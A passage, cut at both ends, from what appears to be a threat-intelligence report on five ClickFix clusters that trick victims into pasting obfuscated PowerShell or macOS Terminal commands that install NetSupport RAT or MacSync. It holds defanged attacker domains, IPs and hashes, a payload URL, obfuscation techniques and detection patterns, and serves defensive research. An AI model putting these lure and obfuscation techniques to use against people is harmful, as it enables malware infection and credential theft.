        <p>The technical core of the methodology relies primarily on pastejacking, where background JavaScript <a href="https://www.truesec.com/hub/blog/threat-actors-paste-jacking-remote-code-execution">populates</a> a victim's clipboard with an obfuscated command while they are <a href="https://www.bleepingcomputer.com/news/security/inside-a-real-clickfix-attack-how-this-social-engineering-hack-unfolds/">distracted</a> by visual lures such as fraudulent reCAPTCHA or Cloudflare Turnstile overlays. In some instances, malicious commands are not automatically pasted into the victim’s clipboard, but rather, victims are manipulated into copying and running the command manually. By leveraging a living-off-the-land (LotL) approach, threat actors manipulate users into <a href="https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/">executing</a> these commands directly within trusted system tools like the Windows Run dialog box, PowerShell, or the macOS Terminal. This user-assisted execution <a href="https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/">allows</a> malicious scripts to execute silently and bypass traditional browser and endpoint security perimeters.</p>
        <p>ClickFix has been weaponized by a diverse spectrum of threat actors, ranging from high-volume initial access brokers (IABs) to <a href="https://www.securityweek.com/clickfix-widely-adopted-by-cybercriminals-apt-groups/#:~:text=All%20variations%20work%20in%20a,distribution%20of%20the%20XWorm%20RAT.">sophisticated state-sponsored</a> groups such as BlueDelta (aka <a href="https://cert.gov.ua/article/6281123">APT28</a>) and the <a href="https://www.infosecurity-magazine.com/news/clickfake-interview-campaign/">North Korean</a> group PurpleBravo. The <a href="https://socradar.io/blog/clickfix-filefix-copy-paste-top-social-engineering/">methodology</a> enables a repeatable and scalable delivery framework capable of deploying a wide variety of secondary payloads, including infostealers like Lumma Stealer and Vidar, or remote access trojans (RATs) such as NetSupport RAT and Odyssey Stealer. These <a href="https://netlas.io/blog/fake_prompts/">operations</a> are frequently supported by highly adaptive, disposable infrastructure designed to maintain operational continuity even as individual domains are identified and blocked.</p>
        <h2>Technical Analysis</h2>
        <p>Insikt Group identified and tracked five emerging ClickFix clusters by leveraging the Recorded Future HTML Content Analysis dataset, which enables the systematic monitoring of embedded web artifacts. By pivoting on unique technical identifiers, including specific Document Object Model (DOM) hashes, hard-coded image source tags, and unique page titles, Insikt Group mapped ClickFix’s infrastructure and identified new malicious domains and infrastructure, facilitating the discovery of active domains and near real-time monitoring of cluster evolution.</p>
        <p>Across the analyzed clusters, Insikt Group detailed the ClickFix commands victims were manipulated into executing on their systems. These commands relied heavily on LOLBins to achieve operational goals. By using LOLBins, threat actors leveraged native, legitimately signed executables to download malicious payloads to a victim's machine. Depending on the security implementation of personal machines or corporate endpoints, this methodology can effectively evade standard detections and foundational security principles.</p>
        <h2>ClickFix Clusters</h2>
        <p>Insikt Group identified five clusters (see Figure 1) that exhibited significant operational variance despite a shared reliance on the ClickFix social engineering technique. These clusters were defined by their infrastructure patterns and targeting approaches, ranging from logistics-themed lures to dual-platform selection logic. This indicates that the ClickFix methodology is being deployed across a fragmented ecosystem of threat actors, each tailoring the technique to suit their own delivery requirements and victim profiles.</p>
        <p>These clusters were grouped based on observable patterns in infrastructure reuse, lure formatting, platform targeting, and operational adjustments over time. While core technical elements and delivery mechanisms overlap, each cluster maintained a distinct footprint within the broader landscape. Insikt Group categorized the activity into the following five clusters:</p>
        <ul>
          <li><strong>Intuit QuickBooks:</strong> Targeted impersonation of accounting software, often leveraging aged domains to bypass security filters</li>
          <li><strong>Booking.com:</strong> Used fraudulent domains to present fake verification portals</li>
          <li><strong>Birdeye:</strong> A large-scale cluster that lures users of the AI marketing company Birdeye by spoofing domains and manipulating victims to use a malicious command to deliver NetSupport RAT.</li>
          <li><strong>Dual-Platform Selection:</strong> Used operating system detection to deliver platform-tailored lures and malware</li>
          <li><strong>macOS Storage Cleaning:</strong> Used counterfeit prompts mimicking macOS system optimization to trick users into executing encoded terminal commands</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_150aa308107dfdb116e75074b6d2fe2a56e876ba8.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1129" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1</strong>: Overview of ClickFix and associated clusters (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Cluster 1: Intuit QuickBooks</h2>
        <p>Cluster 1 was observed operating from January 2026 to the time of writing, primarily targeting organizations through social engineering lures impersonating the accounting software Intuit QuickBooks. QuickBooks is widely used for tax preparation in the United States; given the campaign's active window coincides with the US tax season (typically January through April 15), Insikt Group assesses with moderate confidence that the timing was a calculated effort to target entities engaged in financial reporting. Although this cluster recently pivoted to targeting users of the US real estate marketplace Zillow, QuickBooks-related artifacts and brand-specific imagery remain deeply embedded throughout the Document Object Model (DOM) of the malicious landing pages.</p>
        <h3>Cluster 1 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1afae411ae78063da81d0b8523c7a456001ecf471.png?width=750&amp;format=png&amp;optimize=medium" width="1522" height="1162" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2</strong>: Overview of ClickFix Cluster 1 — Intuit QuickBooks (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16f899c13b76a95cab5142d9de36b9e832cf66f63.png?width=750&amp;format=png&amp;optimize=medium" width="1522" height="758" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 1:</strong></em> <em>PowerShell commands observed across Cluster 1</em></div>
          </div>
        </div>
        <h3><em>Cluster 1 Infection Chain</em></h3>
        <p>The infection chain begins when a victim lands on a ClickFix landing page. The page presents a fraudulent human-verification interface (see <strong>Figure 3</strong>) that instructs the victim to complete specific "verification" steps.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1953657b4363956e75250f0c155e1224d5e030c22.png?width=750&amp;format=png&amp;optimize=medium" width="1351" height="878" />
            </div>
          </div>
          <div>
            <div><strong>Figure 3</strong>: Intuit QuickBooks-themed ClickFix page (Source: Recorded Future Web Scans)</div>
          </div>
        </div>
        <p>By interacting with the page, the victim unknowingly copies a malicious command to their system clipboard. The technique often results in execution through native system utilities, such as Windows Run dialog and PowerShell, leveraging LOLBins to evade traditional browser and endpoint-based security controls.</p>
        <p>Upon pasting the command, an obfuscated PowerShell script (Figure 4) executes in a hidden window. This stager uses self-referential function names to dynamically construct and invoke <code>Invoke-RestMethod</code> to the domain nobovcs[.]com.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15ac4061a037d6d798b97174406beabefc69fc35d.png?width=750&amp;format=png&amp;optimize=medium" width="1508" height="292" />
            </div>
          </div>
          <div>
            <div><strong>Figure 4</strong>: Obfuscated PowerShell command executed in a hidden window, dynamically reconstructing and invoking code via iex (Source: Recorded Future)</div>
          </div>
        </div>
        <p>This request triggers the retrieval of a short PowerShell stager (see <strong>Figure 5</strong>) that downloads a second-stage payload,<code> bibi.php</code>, saving it to the <code>%TEMP%</code> directory as script.ps1. This stager is the initial execution step that kicks off the NetSupport RAT installation.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dfacfa2916f08dad6926c4489f4289563aee07c2.png?width=750&amp;format=png&amp;optimize=medium" width="1508" height="626" />
            </div>
          </div>
          <div>
            <div><strong>Figure 5:</strong> Stager script to download second-stage script, bibi.php (Source: Recorded Future)</div>
          </div>
        </div>
        <p>The <code>bibi.php</code> script is essential for the final deployment phase and for obfuscating on-disk artifacts. It contains a function called <code>Get-RomanticName</code>, which selects and combines strings from a thematic wordlist, including terms such as "Heart", "Soul", and "Desire", to generate a randomized folder name under <code>%LOCALAPPDATA%</code>, where the staging files are placed.</p>
        <p>The script retrieves four primary files from <em>nobovcs[.]com,</em> detailed in Table 2.</p>
        <div>
          <div>
            <div><strong>Filename</strong></div>
            <div><strong>SHA-256</strong></div>
          </div>
          <div>
            <div>at.7z</div>
            <div>c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50</div>
          </div>
          <div>
            <div>lnk.7z</div>
            <div>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</div>
          </div>
          <div>
            <div>7z.exe</div>
            <div>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</div>
          </div>
          <div>
            <div>7z.dll</div>
            <div>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</div>
          </div>
        </div>
        <p><em><strong>Table 2:</strong></em> <em>Filenames and SHA256 hashes of the files downloaded from</em> nobovcs[.]com <em>(Source: Recorded Future)</em></p>
        <p>The script uses <code>7z.exe</code> to extract <code>at.7z</code> (protected by the password “pppp”), which contains the NetSupport RAT binary, <code>neservice.exe</code>. Persistence is established by hijacking Startup shortcuts; if no existing shortcut is detected, the script extracts <code>lnk.7z</code> to the Startup folder to ensure the payload launches automatically upon system reboot.</p>
        <p>Following successful execution, the binary <code>neservice.exe</code> performs an HTTP GET request to <em>gologpoint[.]com</em> to initiate command-and-control (C2) communications. <em>gologpoint[.]com</em> resolves to the IP address <em>62[.]164[.]177[.]230</em>.</p>
        <h2>Cluster 2: Booking.com</h2>
        <p>Cluster 2 was observed operating from February 2026 to the time of writing, impersonating the travel agency Booking.com. Insikt Group tracked the cluster by pivoting on a unique DOM hash made possible by the threat actor’s repeated use of a unique HTML title and consistent image files. Indicators of compromise (IoCs) tagged in this cluster can be seen in the Recorded Future HTML Content Analysis. The landing pages for this cluster use a counterfeit reCAPTCHA v2 challenge, requiring victims to select all photos containing a "bucket" (<strong>Figure 6</strong>). Insikt Group observed that the same challenge photos are presented in the same order across all analyzed pages.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_188f4bdaf603c790d3c24ab3fb11342099dff27c7.png?width=750&amp;format=png&amp;optimize=medium" width="1298" height="728" />
        </p>
        <h3>Cluster 2 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15fb5ca7c219bf306c0b154c98992ceec8bb83113.png?width=750&amp;format=png&amp;optimize=medium" width="1508" height="954" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7</strong>: Overview of ClickFix Cluster 2 — Booking.com (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_113c8926c6e60fa47227578a7bdacee4e10079a96.png?width=750&amp;format=png&amp;optimize=medium" width="1458" height="246" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 3:</strong></em> <em>PowerShell commands observed across Cluster 2</em></div>
          </div>
        </div>
        <h3>Cluster 2 Infection Chain</h3>
        <p>The process begins when a victim interacts with the fake challenge. Upon completing the challenge, the victim is redirected to a verification page where a malicious PowerShell command (<strong>see Figure 8</strong>) is copied to the system clipboard. Instructions on the verification page manipulate the victim into opening the Windows Run dialog box and entering the command. Executing this malicious command starts the infection chain for NetSupport RAT.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_142f6e6aeed187e29123ff2cddd49f883ba4586be.png?width=750&amp;format=png&amp;optimize=medium" width="1494" height="322" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 8:</strong></em> <em>Command from the booking campaign that reaches out to the payload server (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>The PowerShell command provided in <code>script.ps1</code> (see <strong>Figure 9</strong>) executes with the <code>-NoProfile</code> and <code>-ExecutionPolicy Bypass</code> flags to evade standard logging and security restrictions. Following execution, the system pulls four staging files to a directory named <code>DesireSpark Serenade</code>. This directory naming convention is functionally identical to the "romantic" naming methodology observed in Cluster 1.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1466ddd2b2d192abf84da2039c64f98b9ca8c3d15.png?width=750&amp;format=png&amp;optimize=medium" width="1510" height="770" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 9</strong>: DOM file from</em> checkpulse[.]com <em>that details the command to be run on the victim machine, suppressing the protections normally in place to pull down the PowerShell command and execute it (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>The primary staging mechanism relies on <code>script.ps1</code> to pull secondary payloads from the staging server. In one analyzed instance, scripts originating from <em>thestayreserve[.]</em>com reached out to <em>checkpulses[.]</em>com to retrieve the files detailed in <strong>Table 4.</strong></p>
        <div>
          <div>
            <div><strong>Filename</strong></div>
            <div><strong>SHA-256</strong></div>
          </div>
          <div>
            <div>at.7z</div>
            <div>397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8</div>
          </div>
          <div>
            <div>lnk.7z</div>
            <div>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</div>
          </div>
          <div>
            <div>7z.exe</div>
            <div>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</div>
          </div>
          <div>
            <div>7z.dll</div>
            <div>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</div>
          </div>
        </div>
        <p><em><strong>Table 4:</strong></em> <em>Filenames and SHA256 hashes of the files downloaded from</em> checkpulses[.]com <em>(Source: Recorded Future)</em></p>
        <p>The <code>7z.exe</code> utility is used to extract <code>at.7z</code>, which contains the NetSupport RAT binary <code>neservice.exe</code>. Persistence is established by adding a link to the system Startup folder.</p>
        <p>The domains observed across this cluster use a similar PowerShell command pattern. However, once the command is executed, the infection chain varies slightly with the staging infrastructure being called. In the cases of <em>sign-in-op-token[.]com</em> and the <em>thestayreserve[.]com</em> domains, the malicious command is identical in terms of pattern and organization, but the hard-coded dropper domain is <em>bkng-updt[.]com</em> and <em>checkpulses[.]com</em>, respectively.</p>
        <p>While staging domains vary, the final payloads across this cluster converge on the same NetSupport RAT C2 infrastructure (<strong>Table 5</strong>).</p>
        <div>
          <div>
            <div><strong>Click Fix Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>Dropper</strong></div>
            <div><strong>NetSupport RAT C2</strong></div>
          </div>
          <div>
            <div>sign-in-op-token[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>
              <p>bkng-updt[.]com</p>
              <p>77[.]91[.]65[.]144</p>
            </div>
            <div>
              <p>hotelupdatesys[.]com</p>
              <p>152[.]89[.]244[.]70</p>
            </div>
          </div>
          <div>
            <div>thestayreserve[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>
              <p>checkpulses[.]com</p>
              <p>77[.]91[.]65[.]31</p>
            </div>
            <div>
              <p>chrm-srv[.]com</p>
              <p>ms-scedg[.]com</p>
              <p>152[.]89[.]244[.]70</p>
            </div>
          </div>
        </div>
        <p><em><strong>Table 5:</strong></em> <em>IoCs observed in the Booking.com infection chain (Source: Recorded Future)</em></p>
        <p>Following installation, the malware from <em>thestayreserve[.]com</em> initiates communication (<strong>Figure 10</strong>) with <em>chrm-srv[.]com</em> and <em>ms-scedg[.]com</em>, both of which resolve to <em>152[.]89[.]244[.]70</em>. The domain <em>hotelupdatesys[.]com</em> , resolves to the same IP address as the NetSupport RAT C2 for <em>sign-in-op-token[.]com</em>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_17e4c38a5fc2867dd56076e5a5fdbcf434b8ad6fe.png?width=750&amp;format=png&amp;optimize=medium" width="1466" height="772" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 10:</strong></em> <em>POST Request from</em> sign-in-op-token[.]com <em>showing NetSupport interaction (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Cluster 3: Birdeye</h2>
        <p>Cluster 3 was observed operating from May 2024 until the time of writing. Previously reported on by Insikt Group, this cluster uses infrastructure centered on domains incorporating the keyword "bird" to deliver its ClickFix lure pages, trackable in Recorded Future’s HTML Content Analysis. These lures spoof Birdeye, an AI marketing company, to manipulate victims into executing malicious commands.</p>
        <h3>Cluster 3 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1df156ae60dfd2e6c4b1d3a2ee033c7eae94c5c25.png?width=750&amp;format=png&amp;optimize=medium" width="1480" height="1042" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 11</strong>: Overview of ClickFix Cluster 3 — Birdeye (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_152cb9c63c01bb7c8a4abb2cfff959cd1e5dfe5a1.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="240" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 6:</strong></em> <em>PowerShell command observed across Cluster 3</em></div>
          </div>
        </div>
        <h3>Cluster 3 Infection Chain</h3>
        <p>The infection chain begins when a victim visits a compromised site and is presented with a Cloudflare-style CAPTCHA challenge. Upon interacting with the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastructure.</p>
        <p>The command the victim is manipulated into running causes the victim’s device to reach out to <em>alababababa[.]cloud</em> to download a payload from <em>hxxps[://]alababababa[.]cloud/cVGvQio6[.]txt.</em> To further reduce suspicion, once the malicious command is executed, the victim is redirected to the legitimate <em>birdeye.com</em> website (see <strong>Figure 12)</strong>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_19de0a1b7b9ff9d5e6f1ef0dc991bd6180c38a92f.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 12:</strong></em> <em>The redirect to the legitimate Birdeye website (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Analysis of the JavaScript within the DOM for this cluster, provided in <strong>Appendix F,</strong> revealed insights into the threat actor's methods. A notable portion of the script uses seven obfuscated lines that are concatenated into a single string to be attached to the victim's clipboard. The developer left comments within the code that detail the deobfuscated purpose of each line. For example, one comment explicitly identifies the portion of the command calling PowerShell with specific flags (<strong>Figure 13</strong>).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_174bbc4877775d467b17148e38520931ee756c7d2.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="136" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 13:</strong></em> <em>Portion of JavaScript containing threat actor comments (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Furthermore, a comment written in Cyrillic at the beginning of the script translates to, "This should help bypass Cloudflare static analysis". This internal documentation suggests the threat actor is purposefully detailing their actions to refine bypass techniques against security scanners.</p>
        <p>Historically, <em>alababababa[.]cloud</em> has been <a href="https://dti.domaintools.com/securitysnacks/hunting-for-malware-networks">associated</a> with the delivery of multiple malware strains, including Lumma Stealer and RedLine Stealer. The large volume of domains identified in this cluster, exceeding 40 unique entries, highlights the scale of the "run and repeat" model used to sustain this activity.</p>
        <h2>Cluster 4: Dual-Platform Selection</h2>
        <p>Cluster 4 was observed operating from March 2025 to the time of writing. This cluster is unique for its use of operating system detection to deliver tailored ClickFix lures for both Windows and macOS users. Unlike standard ClickFix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided staging payload. One of the ClickFix pages used to analyze this behavior was <em>macosapp-apple[.]com</em>, hosted at IP address <em>45[.]144[.]233[.]192.</em></p>
        <h3>Cluster 4 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_133d418b6a1811ed5c4ec6a91a5ad4948c6fd5d05.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="1224" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 14</strong>: Overview of ClickFix Cluster 4 — Dual-Platform Selection (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1355d223dd69035a45bcc034a66983b44f5504547.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="532" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 7:</strong></em> <em>Encoded commands observed across Cluster 4</em></div>
          </div>
        </div>
        <h3>Cluster 4 Infection Chain</h3>
        <p>The infection chain begins when a victim lands on a ClickFix page that instructs them to verify they are human (<strong>Figure 15</strong>).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dd0aad9b15938b48669c9aa30af7cce46081babb.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 15</strong>: ClickFix page identified in Cluster 4 (Source: Recorded Future Web Scans)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1da0a662a297a2130b487e627394bbe8e6a250860.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 23</strong>: Landing page for</em> mac-os-helper[.]com <em>(Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Once the Terminal is open, the victim is prompted to execute a multi-stage command that purportedly "finds and removes temporary system files".</p>
        <p>In reality, these commands (see <strong>Table 9</strong>) use different encoding layers to hide their true intent; the first example decodes a hexadecimal string to reveal a Base64-encoded client URL (curl) instruction, while the second directly decodes a Base64 string to run an executable command. Both methods ultimately bypass simple pattern matching by obfuscating the malicious payload until execution.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a8a940b22efe1a0138ad299b1a137a4f5fec5441.png?width=750&amp;format=png&amp;optimize=medium" width="1486" height="396" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 9</strong>: Encoded and obfuscated ClickFix commands for macOS (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>As shown in <strong>Table 10</strong>, the revealed curl instruction uses a compound set of arguments, in this cluster, <code>-kfsSL</code>, to facilitate silent delivery. These flags ensure that Transport Layer Security (TLS) certificate checks are bypassed, server-side errors are suppressed, and the process remains hidden from the user's view while following redirections to reach the final payload domain.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1455f0d1912baf993ed061038c5191b4538089d06.png?width=750&amp;format=png&amp;optimize=medium" width="1486" height="258" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 10:</strong></em> <em>Decoded and deobfuscated ClickFix commands for macOS (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Based on historic evidence (<a href="https://threatfox.abuse.ch/ioc/1748676/">1</a>, <a href="https://threatfox.abuse.ch/ioc/1743300/">2</a>) and forensic patterns, Insikt Group assesses with high confidence that the information stealer MacSync was the primary payload used to infect victims in this cluster. The malicious commands on these pages caused the infected systems to reach out to a specific set of staging and C2 infrastructure, detailed in <strong>Table 11</strong>. Notably, while the domains varied, they were frequently observed behind Cloudflare to complicate network-level blocking.</p>
        <div>
          <div>
            <div><strong>Indicator</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>octopox[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2026-02-06</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>joeyapple[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2026-02-04</div>
            <div>2026-03-05</div>
          </div>
        </div>
        <p><em><strong>Table 11</strong>: C2 servers identified for the macOS cleaner campaign (Source: Recorded Future)</em></p>
        <h2>Copy Command Analysis</h2>
        <p>Insikt Group analyzed commands across the five clusters identified in this research. While the visual lures and impersonated brands vary between groups like Cluster 1 (Intuit QuickBooks) and Cluster 5 (macOS Storage Cleaning), the underlying execution logic remains consistent. This "run and repeat" methodology relies on a narrow set of trusted LOLBins and lightweight obfuscation to stage remote code with minimal forensic artifacts.</p>
        <p>The technical implementation of ClickFix follows a standardized four-stage pattern across all target operating systems, as summarized in <strong>Table 12</strong>.</p>
        <div>
          <div>
            <div><strong>Stage</strong></div>
            <div><strong>Action</strong></div>
            <div><strong>Technical Intent</strong></div>
          </div>
          <div>
            <div><strong>Obfuscated Input</strong></div>
            <div>Input of highly encoded or fragmented strings</div>
            <div>Bypass static analysis and signature-based detection</div>
          </div>
          <div>
            <div><strong>Native Execution</strong></div>
            <div>Leveraging trusted system shells (<code>zsh</code>, <code>bash</code>, or <code>powershell.exe</code>)</div>
            <div>Execute the initial stager using legitimate system binaries</div>
          </div>
          <div>
            <div><strong>Remote Ingress</strong></div>
            <div>Initiation of external requests to threat actor-controlled IPs or domains</div>
            <div>Download secondary scripts or payloads from the staging infrastructure</div>
          </div>
          <div>
            <div><strong>In-Memory Execution</strong></div>
            <div>Piping downloaded content directly into an interpreter</div>
            <div>Ensure no malicious files are initially saved to disk to evade endpoint security</div>
          </div>
        </div>
        <p><em><strong>Table 12</strong>: Standardized four-stage ClickFix execution pattern (Source: Recorded Future)</em></p>
        <p>Insikt Group identified two primary command styles used in macOS-centric campaigns, such as Cluster 4 and Cluster 5, which are detailed in <strong>Table 13</strong>.</p>
        <div>
          <div>
            <div><strong>Technique</strong></div>
            <div><strong>Observed Pattern</strong></div>
            <div><strong>Defender Insight</strong></div>
          </div>
          <div>
            <div><strong>Multi-Stage Encoding</strong></div>
            <div>Hex -&gt; Base64 -&gt; ZSH</div>
            <div>The use of <code>xxd -r -p</code> in a user-initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting.</div>
          </div>
          <div>
            <div><strong>Persistence and Backgrounding</strong></div>
            <div>Use of <code>nohup</code> and the <code>&amp;</code> operator</div>
            <div>This ensures the malicious process continues to run in the background even after the user closes the terminal, providing persistence during staging.</div>
          </div>
        </div>
        <p><em><strong>Table 13</strong>: Observed tactics, techniques, and procedures (TTPs) for macOS and Linux (</em><code>zsh</code> <em>and</em> <code>bash</code><em>) commands (Source: Recorded Future)</em></p>
        <p>Windows-based commands, particularly those observed in Cluster 1 and Cluster 2, exhibit a higher degree of sophistication through "Command Swizzling" and case randomization, as shown in <strong>Table 14</strong>.</p>
        <div>
          <div>
            <div><strong>Technique</strong></div>
            <div><strong>Observed Pattern</strong></div>
            <div><strong>Defender Insight</strong></div>
          </div>
          <div>
            <div><strong>Parameter Obfuscation</strong></div>
            <div>Randomized casing and shortened aliases (for example, <code>-wINDoW MiNI</code>, <code>-wi mi</code>, or <code>-w h</code>)</div>
            <div>Threat actors use these to evade security tools looking for literal strings like "Hidden" or "Minimized".</div>
          </div>
          <div>
            <div><strong>The "Golden" Pattern</strong></div>
            <div>Combining Invoke-RestMethod (<code>irm</code>) with Invoke-Expression (<code>iex</code>)</div>
            <div>This allows for the seamless retrieval and execution of remote code entirely in memory. This combination is a high-fidelity hunt for ClickFix activity.</div>
          </div>
          <div>
            <div><strong>String Manipulation Deception</strong></div>
            <div>Using <code>.Substring()</code> or <code>.Replace()</code> to "build" commands</div>
            <div>Clusters like Cluster 1 avoid explicitly typing <code>iex</code> to bypass static signature detections.</div>
          </div>
        </div>
        <p><em><strong>Table 14</strong>: Observed TTPs for Windows (PowerShell) commands (Source: Recorded Future)</em></p>
        <h2>Mitigations</h2>
        <p>To mitigate the threats posed by ClickFix social engineering and related living-off-the-land (LotL) techniques, Insikt Group recommends a defense-in-depth approach that combines proactive intelligence monitoring with aggressive hardening of native system utilities.</p>
        <ul>
          <li><strong>Operationalize HTML Content Analysis:</strong> Recorded Future customers should use the HTML Content Analysis source to monitor for impersonations of their brand, which are leveraged to deliver ClickFix. Leverage the Recorded Future Intelligence Operations Platform to monitor for unique web artifacts, such as specific Document Object Model (DOM) hashes and page titles, to identify new ClickFix domains in real time.</li>
          <li><strong>Use Recorded Future Threat Intelligence:</strong> Recorded Future customers can proactively mitigate this threat by operationalizing Recorded Future Intelligence Operations Platform data, specifically by leveraging continuously updated Risk Lists and by blocklisting IP addresses and domains associated with ClickFix to block communication with malicious infrastructure.</li>
          <li><strong>Monitor Malicious Infrastructure Risk Lists:</strong> Continuously update security information and event management (SIEM) and endpoint detection and response (EDR) tools with Recorded Future Risk Lists to block traffic to identified staging and command-and-control (C2) domains.</li>
          <li><strong>Use Malware Intelligence</strong>: Leverage the Recorded Future Intelligence Operations Platform to hunt for indicators of compromise (IoCs) associated with payloads identified in this report, such as NetSupport RAT, Odyssey Stealer, and Lumma Stealer.</li>
          <li><strong>Leverage Network Intelligence:</strong> Use <a href="https://go.recordedfuture.com/hubfs/Network_Intelligence_Datasheet.pdf">Recorded Future Network Intelligence</a> to detect exfiltration events early (such as those linked to NetSupport RAT), which can help prevent intrusions before they escalate. This approach relies on comprehensive, proactive infrastructure discovery provided by Insikt Group and the analysis of vast amounts of network traffic.</li>
          <li><strong>Use Identity Module</strong>: Recorded Future customers should leverage the Identity Module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers.</li>
          <li><strong>Disable Windows Run Dialog via Group Policy Objects (GPOs)</strong>: For corporate environments, disable the <code>Win+R </code>keyboard shortcut and the Run command in the Start menu via Group Policy Objects (GPOs). This significantly hinders the ClickFix execution chain, as victims are typically instructed to paste malicious commands directly into this dialog box.</li>
